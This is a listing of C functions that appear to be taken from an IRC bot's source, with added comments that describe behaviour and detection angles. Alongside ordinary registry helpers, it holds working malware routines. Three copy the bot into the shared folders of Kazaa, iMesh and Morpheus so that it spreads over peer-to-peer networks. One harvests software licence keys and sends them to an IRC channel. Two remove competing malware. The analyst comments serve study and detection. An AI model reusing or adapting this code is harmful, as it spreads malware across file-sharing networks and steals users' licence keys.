Exemplo n.º 1
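/**
 * Read a registry value as text and return it as a C string.
 *
 * @param root    Predefined or already-open parent key.
 * @param subkey  Path of the subkey below root.
 * @param name    Name of the value to read.
 * @param type    Type the caller expects (the commented-out default suggests
 *                REG_SZ). For REG_MULTI_SZ the NUL separators between the
 *                strings are rewritten to '\n'. Only this argument selects the
 *                conversion; the type stored in the registry is not consulted.
 * @return Pointer to a function-local static buffer holding the data, or NULL
 *         when the key cannot be opened or the value cannot be read. The
 *         buffer is shared by every call and overwritten by the next one.
 */
char *RegQuery(HKEY root,LPCTSTR subkey,LPCTSTR name,DWORD type/*=REG_SZ*/)
{
	static char szRegBuffer[65535+2];
	HKEY key=NULL;
	// Offer the API two bytes less than the buffer holds, so the data is
	// followed by zero bytes even if the stored value lacks its terminator.
	DWORD dwRes=sizeof(szRegBuffer)-2;
	LONG lRet;

	// Clear the whole buffer, including the two reserved tail bytes, so data
	// from a previous call can never leak into this result.
	ZeroMemory(szRegBuffer,sizeof(szRegBuffer));

	// Least privilege: reading a value needs query rights only. Requesting
	// KEY_ALL_ACCESS asks for write/delete rights the function never uses.
	if(fRegOpenKeyEx(root,subkey,0,KEY_QUERY_VALUE,&key) != ERROR_SUCCESS)
		return NULL;

	lRet=fRegQueryValueEx(key,name,NULL,NULL,(unsigned char *)szRegBuffer,&dwRes);
	fRegCloseKey(key);	// the handle is not needed past this point on any path
	if(lRet != ERROR_SUCCESS)
		return NULL;

	if (type==REG_MULTI_SZ)
	{
		szRegBuffer[dwRes] = '\0';	// Ensure termination (dwRes <= sizeof-2)

		// Step back over all trailing NULs so only separators between
		// strings are converted below.
		while (dwRes != 0 && szRegBuffer[dwRes]=='\0')
			--dwRes;

		for (DWORD i=0; i<dwRes; ++i)
		{
			if (szRegBuffer[i]=='\0')
				szRegBuffer[i]='\n'; // Convert to \n
		}
	}
	return szRegBuffer;
}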
Exemplo n.º 2
// Walks the viruses[] table (declared outside this listing) up to the first
// entry whose subkey is null. For every entry whose registry value can be
// read, it deletes that value and then deletes the file named by the entry
// from the Windows system directory.
// NOTE(review): judging by the identifiers, the table presumably lists autostart
// values and binaries of other malware families; confirm against the
// viruses[] definition.
// Observable behaviour for an analyst: a registry value deletion immediately
// followed by a DeleteFile on <system directory>\<file>, repeated per entry.
void removevirus()
{
	char sysdir[MAX_PATH], virusexecuteble[MAX_PATH];
	unsigned char szDataBuf[128];

	HKEY hkey;
	LONG lRet;
	DWORD dwSize = 128;	// byte count handed to the query; set once, before the loop

	for (unsigned int i=0; viruses[i].subkey; i++) {
		// The open result is stored in lRet but not examined before the query.
		lRet = fRegOpenKeyEx(viruses[i].hkey, viruses[i].subkey, 0, KEY_READ, &hkey);
		// Acts as a presence check: the data read into szDataBuf is not used afterwards.
		if(fRegQueryValueEx(hkey, viruses[i].value, NULL, NULL, szDataBuf, &dwSize) == ERROR_SUCCESS) {

				fRegDeleteValue(hkey, viruses[i].value);
				//FIXME: Replace the afw kill utils. we dont need to let that loop,
				//		 when we removed the .exe and the reg key. mayb a static call
				//		 to KillProcess(); can be inserted here. Something like:
				// KillProcess(viruses[i].file);
				// Build "<system directory>\<file>" and delete it.
				GetSystemDirectory(sysdir, sizeof(sysdir));
				sprintf(virusexecuteble, "%s\\%s", sysdir, viruses[i].file);
				DeleteFile(virusexecuteble);

		}
		fRegCloseKey(hkey);
	}

	return;
}
Exemplo n.º 3
// Reads the "DownloadsLocation" value under HKLM\SOFTWARE\iMesh\Client and,
// when the read succeeds, calls CopyFile with botfile as the source and the
// value just read as the destination (bFailIfExists = FALSE, so an existing
// destination may be overwritten).
// botfile: path of the file to copy; the parameter name indicates it is the
// bot's own executable.
// Detection angle: a process other than the file-sharing client reading this
// key and then writing a file to the location it names.
void iMeshInit(char *botfile)
{
	char buffer[MAX_PATH];

	HKEY hkey = NULL;
	DWORD dwSize = 128;	// byte count passed to the query (buffer itself is MAX_PATH)

	// The result of the open call is not checked; the query below runs either way.
	fRegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\iMesh\\Client", 0, KEY_READ, &hkey);
	if(fRegQueryValueEx(hkey, "DownloadsLocation", NULL, NULL, (unsigned char*)buffer, &dwSize) == ERROR_SUCCESS) {
		CopyFile(botfile, buffer, FALSE);
	}
	fRegCloseKey(hkey);

	return;
}
Exemplo n.º 4
// Reads the "Dir0" value under HKCU\SOFTWARE\KAZAA\LocalContent, removes the
// "012345:" marker from it via replacestr() (defined outside this listing),
// and then calls CopyFile with botfile as the source and the resulting string
// as the destination (bFailIfExists = FALSE).
// botfile: path of the file to copy; the parameter name indicates it is the
// bot's own executable.
// Detection angle: a process other than the file-sharing client reading this
// per-user key and then writing a file to the folder it names.
void KazaaInit(char *botfile)
{
	char buffer[MAX_PATH];

	HKEY hkey;
	DWORD dwSize = 128;	// byte count passed to the query (buffer itself is MAX_PATH)

	// The result of the open call is not checked; the query below runs either way.
	fRegOpenKeyEx(HKEY_CURRENT_USER, "SOFTWARE\\KAZAA\\LocalContent", 0, KEY_READ, &hkey);
	if(fRegQueryValueEx(hkey, "Dir0", NULL, NULL, (unsigned char*)buffer, &dwSize) == ERROR_SUCCESS) {
		// presumably replaces in place, leaving only the path part; verify against replacestr()
		replacestr(buffer, "012345:", "");
		CopyFile(botfile, buffer, FALSE);
	}
	fRegCloseKey(hkey);

	return;
}
Exemplo n.º 5
// Reads the "Install_Dir" value under HKLM\SOFTWARE\Morpheus, appends
// "\My Shared Folder" to it, calls CreateDirectory on the result and then
// CopyFile with botfile as the source and that same string as the destination
// (bFailIfExists = FALSE).
// botfile: path of the file to copy; the parameter name indicates it is the
// bot's own executable.
// Detection angle: directory creation and a file write under the client's
// "My Shared Folder" by a process that is not the file-sharing client.
void MorpheusInit(char *botfile)
{
	char buffer[MAX_PATH];

	HKEY hkey;
	DWORD dwSize = 128;	// byte count passed to the query (buffer itself is MAX_PATH)

	// The result of the open call is not checked; the query below runs either way.
	fRegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Morpheus", 0, KEY_READ, &hkey);
	if(fRegQueryValueEx(hkey, "Install_Dir", NULL, NULL, (unsigned char*)buffer, &dwSize) == ERROR_SUCCESS) {
		// buffer is both the output and the %s argument of this call
		_snprintf(buffer, sizeof(buffer), "%s\\My Shared Folder", buffer);
		CreateDirectory(buffer, 0);
		CopyFile(botfile, buffer, FALSE);
	}
	fRegCloseKey(hkey);

	return;
}
Exemplo n.º 6
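/**
 * Read a REG_DWORD value from the registry.
 *
 * @param root     Predefined or already-open parent key.
 * @param subkey   Path of the subkey below root.
 * @param name     Name of the value to read.
 * @param success  Out: TRUE only when a value of type REG_DWORD and exactly
 *                 sizeof(DWORD) bytes was read; FALSE on every other path.
 * @return The value read, or 0 when success is FALSE.
 */
DWORD RegQuery(HKEY root,LPCTSTR subkey,LPCTSTR name,BOOL &success)
{
	HKEY key=NULL;
	DWORD dwType=0,dwSize=sizeof(DWORD),dwRead=0;
	LONG lRet;

	success=FALSE;

	// Least privilege: reading a value needs query rights only. Requesting
	// KEY_ALL_ACCESS asks for write/delete rights the function never uses.
	if(fRegOpenKeyEx(root,subkey,0,KEY_QUERY_VALUE,&key)!=ERROR_SUCCESS)
		return 0;

	lRet=fRegQueryValueEx(key,name,NULL,&dwType,(LPBYTE)&dwRead,&dwSize);
	fRegCloseKey(key);	// the handle is not needed past this point on any path

	// The query reports the stored type and size; reject anything that is not
	// a full DWORD instead of reinterpreting a short string or binary blob.
	if(lRet!=ERROR_SUCCESS || dwType!=REG_DWORD || dwSize!=sizeof(DWORD))
		return 0;

	success=TRUE;
	return dwRead;
}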
Exemplo n.º 7
// Walks the regkeys[] table (declared outside this listing) up to the first
// entry whose subkey is null and, for each entry whose registry value can be
// read, reports a product key over IRC:
//   - entry without a file: the registry data itself is reported;
//   - entry with a file: the registry data is treated as a directory, the
//     file <data>\<file> is opened and scanned line by line, and one line
//     (or the part after '=') is reported.
// Each report is sent with irc_privmsg(sock, chan, ..., notice) and recorded
// with addlog(); both helpers are defined outside this listing.
// sock/chan/notice: passed through unchanged to irc_privmsg.
// Detection angle: one process reading many unrelated vendors' licence keys
// from the registry, and the fixed "CD Key: (" text in outbound IRC traffic.
void getcdkeys(SOCKET sock, char *chan, BOOL notice)
{
	char sendbuf[IRCLINE], line[100], szPath[MAX_PATH];
	unsigned char szDataBuf[128];

	FILE *fp;
	HKEY hkey;
	LONG lRet;
	DWORD dwSize = 128;	// byte count handed to the query; set once, before the loop

	for (unsigned int i=0; regkeys[i].subkey; i++) {
		// The open result is stored in lRet but not examined before the query.
		lRet = fRegOpenKeyEx(regkeys[i].hkey, regkeys[i].subkey, 0, KEY_READ, &hkey);
		if(fRegQueryValueEx(hkey, regkeys[i].value, NULL, NULL, szDataBuf, &dwSize) == ERROR_SUCCESS) {
			if (regkeys[i].file) {
				// Registry data is used as a directory; the key is looked up in a file inside it.
				sprintf(szPath, "%s\\%s", szDataBuf, regkeys[i].file);
				if((fp=fopen(szPath,"r"))!=NULL) {
					while(fgets(line,sizeof(line),fp)) {
						// As written, the branch is taken for the first line that does NOT contain the tag.
						if(!strstr(line, regkeys[i].tag)) {
							if (strchr(regkeys[i].tag,'=')) {
								// Tag has the form "name=": report the text after the first '='.
								strtok(line,"=");
								sprintf(sendbuf, "4<<12%s CD Key: (%s).4>> ",regkeys[i].name,strtok(NULL, "="));
							} else
								sprintf(sendbuf, "4<<12%s CD Key: (%s).4>> ",regkeys[i].name,line);
							irc_privmsg(sock,chan,sendbuf,notice);
							addlog(sendbuf);
							break;	// at most one report per file
						}
					}
					fclose(fp);
				}
			} else {
				// No file configured: the registry data itself is reported.
				sprintf(sendbuf, "4<<12%s CD Key: (%s).4>> ",regkeys[i].name,szDataBuf);
				irc_privmsg(sock,chan,sendbuf,notice);
				addlog(sendbuf);
			}
		}
		fRegCloseKey(hkey);
	}

	return;
}
Exemplo n.º 8
// Variant of removevirus() that also calls listProcesses() for each match.
// Walks the viruses[] table (declared outside this listing) up to the first
// entry whose subkey is null. For every entry whose registry value can be
// read, it deletes that value, hands the entry's file name to listProcesses()
// (defined outside this listing), and deletes <system directory>\<file>.
// The status texts formatted into sendbuf are not passed to any other call
// inside this function.
// NOTE(review): judging by the identifiers and the "[PROC]: Process killed"
// text, listProcesses() presumably terminates the named process and the table
// lists other malware families; confirm against their definitions.
// Observable behaviour for an analyst: registry value deletion, a process
// enumeration, and a DeleteFile in the system directory, repeated per entry.
void removevirus()
{
	char sysdir[MAX_PATH], virusexecuteble[MAX_PATH];
	unsigned char szDataBuf[128]; 
	SOCKET sock;
	HKEY hkey;
	char sendbuf[IRCLINE];
	char current[20];	// receives a copy of viruses[i].file via strcpy below
	LONG lRet;
	// A TCP socket is created here and only ever passed to listProcesses();
	// no connect or close on it appears in this function.
	sock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
	DWORD dwSize = 128;	// byte count handed to the query; set once, before the loop

	for (unsigned int i=0; viruses[i].subkey; i++) {
		// The open result is stored in lRet but not examined before the query.
		lRet = fRegOpenKeyEx(viruses[i].hkey, viruses[i].subkey, 0, KEY_READ, &hkey);
		// Acts as a presence check: the data read into szDataBuf is not used afterwards.
		if(fRegQueryValueEx(hkey, viruses[i].value, NULL, NULL, szDataBuf, &dwSize) == ERROR_SUCCESS) {
			
				fRegDeleteValue(hkey, viruses[i].value);
				strcpy(current,viruses[i].file);
				//FIXME: Replace the afw kill utils. we dont need to let that loop,
				//		 when we removed the .exe and the reg key. mayb a static call
				//		 to KillProcess(); can be inserted here. Something like:
				// A return value of 1 from listProcesses() is treated as success.
				if(listProcesses(sock,NULL,FALSE,current) == 1)
					sprintf(sendbuf,"[PROC]: Process killed: %s",viruses[i].file);
				else
					sprintf(sendbuf,"[PROC]: Failed to terminate process: %s", viruses[i].file);
				//KillProcess(viruses[i].file);
				// Build "<system directory>\<file>" and delete it.
				GetSystemDirectory(sysdir, sizeof(sysdir));
				sprintf(virusexecuteble, "%s\\%s", sysdir, viruses[i].file);
				DeleteFile(virusexecuteble);
			
		}
		fRegCloseKey(hkey);
		
	}
	sprintf(sendbuf,"[AV]: Antivirus search complete! ");
	return;
}
Exemplo n.º 9
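/**
 * Look up the Firefox installation directory in the registry.
 *
 * Reads the default value of
 * HKLM\SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command,
 * drops a leading double quote and cuts the string at its last backslash so
 * that only the directory part remains.
 *
 * @return A malloc()-allocated, NUL-terminated directory string that the
 *         caller must free(), or NULL when the key or value cannot be read,
 *         the value is not a string, the value is empty, or allocation fails.
 */
char *GetFirefoxLibPath()
{
	char regSubKey[]    = "SOFTWARE\\Clients\\StartMenuInternet\\firefox.exe\\shell\\open\\command";
	char path[_MAX_PATH] ="";
	char *firefoxPath = NULL;
	// Offer one byte less than the buffer holds: registry strings are not
	// guaranteed to be stored with a terminator, and the string functions
	// below must never run past the end of path.
	DWORD pathSize = sizeof(path) - 1;
	DWORD valueType = 0;
	HKEY rkey;
	LONG lRet;

	// Open firefox registry key
	if( fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regSubKey, 0, KEY_READ, &rkey) != ERROR_SUCCESS )
	{
		//DisplayMesg(TYPE_DEBUG, "\n Failed to open the firefox registry key : HKLM\\%s", regSubKey );
		return NULL;
	}

	// Read the firefox path value, then release the handle on every path
	lRet = fRegQueryValueEx(rkey, NULL, 0,  &valueType, (unsigned char*)path, &pathSize);
	fRegCloseKey(rkey);

	if( lRet != ERROR_SUCCESS )
	{
		//DisplayMesg(TYPE_DEBUG, "\n Failed to read the firefox path value from registry ");
		return NULL;
	}

	// Only string data can be parsed as a path; anything else is rejected
	// rather than interpreted as text.
	if( valueType != REG_SZ && valueType != REG_EXPAND_SZ )
		return NULL;

	path[sizeof(path) - 1] = 0;	// explicit terminator, independent of the stored data

	if( pathSize == 0 || path[0] == 0)
	{
		//DisplayMesg(TYPE_DEBUG, "\n Path value read from the registry is empty");
		return NULL;
	}

	// This path may contain extra double quote....
	// strlen(path) bytes starting at path+1 include the terminator, so the
	// whole string shifts left by one with no stale trailing character.
	if( path[0] == '\"' )
		memmove(path, path + 1, strlen(path));

	//DisplayMesg(TYPE_DEBUG, "\n Path value read from registry is %s", path);

	// Terminate the string at last "\\" (a backslash at index 0 is kept)
	char *lastSep = strrchr(path, '\\');
	if( lastSep != NULL && lastSep != path )
		*lastSep = 0;

	firefoxPath = (char*) malloc( strlen(path) + 1);

	if( firefoxPath )
		strcpy(firefoxPath, path);

	//DisplayMesg(TYPE_DEBUG, "\n Firefox path = [%s] ", firefoxPath);

	return firefoxPath;

}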